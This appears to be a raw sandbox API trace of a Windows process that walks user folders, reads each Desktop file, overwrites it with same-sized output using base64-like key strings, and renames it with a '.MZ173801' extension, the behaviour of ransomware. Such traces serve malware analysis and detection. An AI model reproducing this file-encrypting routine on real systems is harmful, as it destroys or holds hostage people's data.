FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.676] GetLastError () returned 0x12 [0122.676] FindClose (in: hFindFile=0xa1bcb0 | out: hFindFile=0xa1bcb0) returned 1 [0122.676] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bb28 [0122.676] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0122.676] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0122.676] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.676] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.676] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.677] GetLastError () returned 0x12 [0122.677] FindClose (in: hFindFile=0xa1bb28 | out: hFindFile=0xa1bb28) returned 1 [0122.677] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0122.677] GetLastError () returned 0x12 [0122.677] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.677] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0122.677] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.677] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0122.677] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.677] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6d07dee7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d07dee7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.677] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3a81d0, ftCreationTime.dwHighDateTime=0x1d5ebd0, ftLastAccessTime.dwLowDateTime=0xbc4e5260, ftLastAccessTime.dwHighDateTime=0x1d5eb9d, ftLastWriteTime.dwLowDateTime=0xbc4e5260, ftLastWriteTime.dwHighDateTime=0x1d5eb9d, nFileSizeHigh=0x0, nFileSizeLow=0x168cb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4BDKtV--GWe9D.avi", cAlternateFileName="4BDKTV~1.AVI")) returned 1 [0122.677] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.677] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\4BDKtV--GWe9D.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\4bdktv--gwe9d.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3a81d0, ftCreationTime.dwHighDateTime=0x1d5ebd0, ftLastAccessTime.dwLowDateTime=0xbc4e5260, ftLastAccessTime.dwHighDateTime=0x1d5eb9d, ftLastWriteTime.dwLowDateTime=0xbc4e5260, ftLastWriteTime.dwHighDateTime=0x1d5eb9d, nFileSizeHigh=0x0, nFileSizeLow=0x168cb)) returned 1 [0122.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.678] GetCurrentThreadId () returned 0x1358 [0122.678] GetCurrentThreadId () returned 0x1358 [0122.678] GetCurrentThreadId () returned 0x1358 [0122.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.679] GetCurrentThreadId () returned 0x1358 [0122.679] GetCurrentThreadId () returned 0x1358 [0122.679] GetCurrentThreadId () returned 0x1358 [0122.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4BDKtV--GWe9D.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\4bdktv--gwe9d.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.679] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.679] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.679] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x168cb [0122.868] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.869] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x168cb, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x168cb, lpOverlapped=0x0) returned 1 [0122.870] CloseHandle (hObject=0x410) returned 1 [0122.871] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4BDKtV--GWe9D.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\4bdktv--gwe9d.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.873] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x168cb, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x168cb, lpOverlapped=0x0) returned 1 [0122.875] CloseHandle (hObject=0x410) returned 1 [0122.875] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\4BDKtV--GWe9D.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\4bdktv--gwe9d.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\4BDKtV--GWe9D.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\4bdktv--gwe9d.avi.mz173801")) returned 1 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] GetCurrentThreadId () returned 0x1358 [0122.876] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e8b8c0, ftCreationTime.dwHighDateTime=0x1d5effe, ftLastAccessTime.dwLowDateTime=0xffeee3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5f2, ftLastWriteTime.dwLowDateTime=0xffeee3f0, ftLastWriteTime.dwHighDateTime=0x1d5e5f2, nFileSizeHigh=0x0, nFileSizeLow=0xaf4b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4zq3s7.swf", cAlternateFileName="")) returned 1 [0122.876] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.876] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.876] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\4zq3s7.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\4zq3s7.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e8b8c0, ftCreationTime.dwHighDateTime=0x1d5effe, ftLastAccessTime.dwLowDateTime=0xffeee3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5f2, ftLastWriteTime.dwLowDateTime=0xffeee3f0, ftLastWriteTime.dwHighDateTime=0x1d5e5f2, nFileSizeHigh=0x0, nFileSizeLow=0xaf4b)) returned 1 [0122.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.877] GetCurrentThreadId () returned 0x1358 [0122.877] 